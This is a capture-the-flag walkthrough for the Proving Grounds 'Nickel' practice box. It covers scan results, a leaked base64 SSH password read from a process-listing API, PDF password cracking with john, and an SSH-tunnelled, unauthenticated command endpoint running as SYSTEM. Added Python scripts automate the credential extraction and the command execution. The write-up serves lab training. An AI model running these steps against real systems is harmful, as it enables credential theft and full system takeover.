
Proving Grounds Practice - Nickel

Difficulty

medium

scan

[*] ftp found on tcp/21.
FileZilla ftpd


[*] ssh found on tcp/22.
OpenSSH for_Windows_8.1 (protocol 2.0)


[*] http found on tcp/80.
[*] tcpwrapped found on tcp/80.
dev-api (returns HTTP 500 as soon as it is scanned)


[*] msrpc found on tcp/135.

[*] netbios-ssn found on tcp/139.

[*] microsoft-ds found on tcp/445.

[*] ms-wbt-server found on tcp/3389.


[*] http found on tcp/8089.
Microsoft-HTTPAPI/2.0

[*] unknown found on tcp/5040.

[*] http found on tcp/33333.
/list-active-nodes
/list-current-deployments
/list-running-proc


[*] msrpc found on tcp/49664.
[*] msrpc found on tcp/49665.
[*] msrpc found on tcp/49666.
[*] msrpc found on tcp/49667.
[*] msrpc found on tcp/49668.
[*] msrpc found on tcp/49669.

80

dev-api. A gobuster scan makes it return 500 right away, and afterwards the site can no longer be reached. After reverting the machine, manually requesting an arbitrary URL gives a "parameter error" hint. Trying ?whoami returns the current user as system, and a `powershell -en xxx` reverse shell gives a SYSTEM shell. I was puzzled, since this box is rated medium, so I went straight to the walkthrough: port 80 is not supposed to be exposed externally at all. Many OffSec boxes have problems like this that make the challenge easier than intended.

Below is the intended solution path.

8089

Clicking any of the three buttons gets no response and the page is extremely slow. Looking at the page source shows that the buttons request port 33333 on an address in the 169.254.0.0/16 range. That range is link-local, so the browser's requests from the attacking machine never reach it; the service itself is reachable directly on tcp/33333.

33333

So request the three paths directly. All of them reply that GET is not supported; switching to POST returns an error: HTTP Error 411. The request must be chunked or have a content length.

curl -XPOST http://192.168.111.99:33333/list-running-procs
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd">
<HTML><HEAD><TITLE>Length Required</TITLE>
<META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD>
<BODY><h2>Length Required</h2>
<hr><p>HTTP Error 411. The request must be chunked or have a content length.</p>
</BODY></HTML>

Retry with -H 'Content-Length: 0' added. list-running-procs now returns the running processes, and one of them carries ariah's SSH username and password on its command line.

Foothold

ssh ariah@192.168.111.99 rejects the password as it appears in the process list; after base64-decoding it we get NowiseSloopTheory139, and the login succeeds.

ssh ariah@192.168.111.99
ariah@NICKEL C:\Users\ariah>
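The two steps above (POSTing to the helper service on tcp/33333 with an explicit Content-Length: 0 to get past HTTP 411, then recovering the base64-wrapped password from the process listing) as a small Python helper. This is an added example, not code from the original write-up or from the box. The host, port and endpoint paths are the ones the write-up shows; the process-listing format in SAMPLE_LISTING is constructed for this example and is not the real output of the service.

```python
"""Added example, not code from the original write-up: query the dev-api
helper service on tcp/33333 the way the write-up does (POST with an explicit
Content-Length: 0 to avoid HTTP 411) and pull base64-wrapped credentials out
of its process listing.

Assumptions (not from the page): the process-listing format in SAMPLE_LISTING
is constructed for this example; the real box prints its own format. The
host, port and endpoint paths are the ones the write-up shows."""
from __future__ import annotations

import base64
import http.client
import re
import string
import sys

ENDPOINTS = ["/list-active-nodes", "/list-current-deployments", "/list-running-procs"]


def post_with_length(host: str, port: int, path: str, timeout: float = 10.0) -> tuple[int, str]:
    """POST with no body but an explicit Content-Length: 0.

    The service is fronted by http.sys (Microsoft-HTTPAPI/2.0), which rejects a
    POST carrying neither Content-Length nor Transfer-Encoding with HTTP 411.
    curl -XPOST with no data sends neither header, hence the error in the
    write-up; declaring a zero length makes the request acceptable.
    """
    conn = http.client.HTTPConnection(host, port, timeout=timeout)
    try:
        conn.request("POST", path, body=b"", headers={"Content-Length": "0"})
        resp = conn.getresponse()
        return resp.status, resp.read().decode("utf-8", errors="replace")
    finally:
        conn.close()


# A base64 run of at least 16 characters that is not glued to other base64 characters.
B64_TOKEN = re.compile(r"(?<![A-Za-z0-9+/])[A-Za-z0-9+/]{16,}={0,2}(?![A-Za-z0-9+/=])")
_PRINTABLE = set(string.printable) - {"\x0b", "\x0c"}


def decode_if_text(token: str) -> str | None:
    """Return the decoded string if token is valid base64 for printable ASCII,
    otherwise None. This filters out ordinary long words and binary blobs."""
    try:
        raw = base64.b64decode(token, validate=True)
    except ValueError:  # binascii.Error is a ValueError subclass
        return None
    try:
        text = raw.decode("ascii")
    except UnicodeDecodeError:
        return None
    if text and all(ch in _PRINTABLE for ch in text):
        return text
    return None


def find_secrets(proc_listing: str) -> list[tuple[str, str]]:
    """Scan every line of a process listing and return (token, decoded) pairs.

    Credentials embedded in a command line are readable by anyone who can list
    processes; base64 hides them from a glance, nothing more."""
    hits: list[tuple[str, str]] = []
    for line in proc_listing.splitlines():
        for match in B64_TOKEN.finditer(line):
            decoded = decode_if_text(match.group(0))
            if decoded is not None:
                hits.append((match.group(0), decoded))
    return hits


# CONSTRUCTED sample listing for offline testing; not the box's real output.
SAMPLE_LISTING = """\
Image Name    PID   Command Line
svchost.exe   812   C:\\Windows\\System32\\svchost.exe -k netsvcs
sshd.exe      1588  "C:\\Program Files\\OpenSSH\\sshd.exe"
cmd.exe       2212  cmd.exe /c powershell.exe -nop -c "$u='ariah';$p='Tm93aXNlU2xvb3BUaGVvcnkxMzk='"
"""


if __name__ == "__main__":
    # Usage: python3 nickel_api.py 192.168.111.99   (no argument: parse the sample only)
    host = sys.argv[1] if len(sys.argv) > 1 else None
    listing = SAMPLE_LISTING
    if host:
        for path in ENDPOINTS:
            status, body = post_with_length(host, 33333, path)
            print(f"{path}: HTTP {status}")
            if path.endswith("list-running-procs"):
                listing = body
    for token, decoded in find_secrets(listing):
        print(f"{token} -> {decoded}")
```

The decoder deliberately requires printable ASCII after decoding: a long alphanumeric word such as a hostname or a hash is often valid base64 too, but it decodes to binary garbage and is dropped, so only genuinely encoded text such as the password on the command line survives.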

Escalation

Logging in to smbclient with ariah's credentials works, but there is nothing in the shares. Logging in to FTP reveals a PDF file; after downloading it, it asks for a password when opened.

ftp -a -A ariah@192.168.111.99
Connected to 192.168.111.99.
220-FileZilla Server 0.9.60 beta
220-written by Tim Kosse (tim.kosse@filezilla-project.org)
220 Please visit https://filezilla-project.org/
331 Password required for ariah
Password:
230 Logged on
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
200 Port command successful
150 Opening data channel for directory listing of "/"
-r--r--r-- 1 ftp ftp 46235 Sep 01 2020 Infrastructure.pdf
226 Successfully transferred "/"

pdf2john Infrastructure.pdf > pdf.hash

john --wordlist=/usr/share/wordlists/rockyou.txt pdf.hash

Crack the password with john. The PDF's content is simple as well; it mentions a command endpoint. Checking the system's processes and listening ports at this point shows that port 80 is listening.

Set up a tunnel with SSH local port forwarding; after that, arbitrary commands can be executed.

kali@kali:~$ sudo ssh -L80:192.168.120.209:80 ariah@192.168.120.209
...
Microsoft Windows [Version 10.0.18362.1016]
(c) 2019 Microsoft Corporation. All rights reserved.

ariah@NICKEL C:\Users\ariah>
kali@kali:~$ curl http://localhost/?whoami

<!doctype html><html><body>dev-api started at 2020-09-18T11:14:22

<pre>nt authority\system
</pre>
</body></html>kali@kali:~$
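The command endpoint driven through the tunnel, as an added example that is not code from the original write-up or from the box. It assumes the local forward shown above is up, so the service answers on http://localhost/, and that the command is sent as the raw query string (the page shows ?whoami); that percent-encoded spaces and slashes are accepted is an assumption, not something the write-up demonstrates. SAMPLE_REPLY is the reply quoted above, embedded so the parsing can be checked offline.

```python
"""Added example, not code from the original write-up or the box: a small
client for the dev-api command endpoint reached through the SSH local forward.

Assumptions (not from the page): the forward from the write-up is up, so the
service answers on http://localhost/; the command is sent as the raw query
string (the page shows ?whoami) and percent-encoding of spaces is accepted;
SAMPLE_REPLY is the reply quoted in the write-up, embedded for offline use."""
from __future__ import annotations

import http.client
from html.parser import HTMLParser
from urllib.parse import quote

# The reply quoted in the write-up for ?whoami, embedded for offline parsing.
SAMPLE_REPLY = (
    "<!doctype html><html><body>dev-api started at 2020-09-18T11:14:22\n\n"
    "<pre>nt authority\\system\n</pre>\n</body></html>"
)


def command_path(cmd: str) -> str:
    """The command is the entire query string, so no key=value pair is built;
    spaces and slashes are percent-encoded (assumption: the endpoint decodes them)."""
    return "/?" + quote(cmd, safe="")


class _PreText(HTMLParser):
    """Collect the text inside the <pre> block the endpoint wraps output in."""

    def __init__(self) -> None:
        super().__init__()
        self._inside = False
        self.chunks: list[str] = []

    def handle_starttag(self, tag, attrs):
        if tag == "pre":
            self._inside = True

    def handle_endtag(self, tag):
        if tag == "pre":
            self._inside = False

    def handle_data(self, data):
        if self._inside:
            self.chunks.append(data)


def parse_reply(html: str) -> str:
    """Return only the command output, without the dev-api banner and markup."""
    parser = _PreText()
    parser.feed(html)
    parser.close()
    return "".join(parser.chunks).strip()


def run(cmd: str, host: str = "localhost", port: int = 80) -> str:
    """Send one command through the tunnel and return its output.

    The endpoint executes as NT AUTHORITY\\SYSTEM with no authentication; the
    only protection it had was not being exposed externally, which the SSH
    forward removes for anyone holding ariah's credentials."""
    conn = http.client.HTTPConnection(host, port, timeout=30)
    try:
        conn.request("GET", command_path(cmd))
        resp = conn.getresponse()
        status, body = resp.status, resp.read().decode("utf-8", errors="replace")
    finally:
        conn.close()
    if status != 200:
        raise RuntimeError(f"dev-api returned HTTP {status}")
    return parse_reply(body)


if __name__ == "__main__":
    import sys
    # Usage (with the forward up): python3 nickel_cmd.py whoami
    print(run(" ".join(sys.argv[1:]) or "whoami"))
```

Output is pulled from the <pre> element with a real HTML parser rather than a regex so that command output containing angle brackets or multiple lines still comes back intact.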